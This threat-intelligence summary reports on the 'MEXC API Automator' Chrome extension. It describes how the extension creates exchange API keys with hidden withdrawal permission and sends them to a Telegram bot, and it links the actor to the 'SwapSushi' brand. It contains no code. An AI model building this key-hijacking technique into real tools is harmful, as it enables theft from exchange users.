Key Findings

• Researchers have discovered a malicious Google Chrome extension named "MEXC API Automator" that steals API keys from MEXC cryptocurrency exchange users.

• The extension masquerades as a tool to simplify the management of MEXC API keys for automated trading.

• In reality, the extension programmatically creates new API keys, enables withdrawal permissions, hides the withdrawal permission in the UI, and exfiltrates the API keys to a Telegram bot controlled by the threat actor.

• This allows the attackers to gain full control over the victim's MEXC account, enabling them to execute trades, perform automated withdrawals, and drain the account's balance.

• The attack leverages an already authenticated browser session, bypassing the need for passwords or 2FA codes, making it particularly dangerous.

• Analysis of the extension's code reveals Russian language comments, suggesting the threat actor is likely a Russian speaker.

• The extension is linked to a broader cluster of crypto-focused threats, including the "SwapSushi" brand, further supporting the Russian connection.

Background

The MEXC API Automator extension was published on the Chrome Web Store on September 1, 2025, by an entity known as "jorjortan142". The extension promised to simplify the complex process of managing API keys for high-frequency trading on the MEXC cryptocurrency exchange.

Malicious Functionality

• The extension programmatically creates new MEXC API keys, enables withdrawal permissions, and hides the withdrawal permission in the user interface (UI).

• It then exfiltrates the API key and secret to a hardcoded Telegram bot controlled by the threat actor.

• This gives the attackers full control over the victim's MEXC account, allowing them to execute trades, perform automated withdrawals, and drain the account's balance.

• The attack is particularly dangerous as it leverages an already authenticated browser session, bypassing the need for passwords or 2FA codes.

Technical Analysis

• Analysis of the extension's code revealed numerous inline comments written in Russian, suggesting the threat actor is likely a Russian speaker.

• The extension is also linked to the "SwapSushi" brand, which appears across Telegram bots and YouTube channels associated with the same actor.

• This evidence supports a "moderate confidence assessment" linking the malicious Chrome extension to a broader cluster of crypto-focused threats.

Conclusion

The MEXC API Automator extension is a sophisticated wallet-draining trap that targets MEXC exchange users under the guise of a trading automation tool. By hijacking the API key management workflow, the attackers can bypass traditional security controls and gain full control over the victim's account, posing a severe risk to their funds. The Russian language artifacts and connections to the "SwapSushi" brand suggest the threat actor behind this malware is likely a Russian speaker.

Sources

• https://securityonline.info/malicious-chrome-extension-drains-crypto-via-secret-api-keys/

• https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html

• https://barid.tv/2026/01/13/crypto-heist-in-your-browser-malicious-chrome-extension-steals-mexc-api-keys/

• https://www.abit.ee/en/cybersecurity/mexc-api-automator-malicious-chrome-extension-cryptocurrency-theft-api-keys-mexc-exchange-cyber-thre-en

• https://cybersecuritynews.com/malicious-chrome-extension-steals-wallet-login-credentials/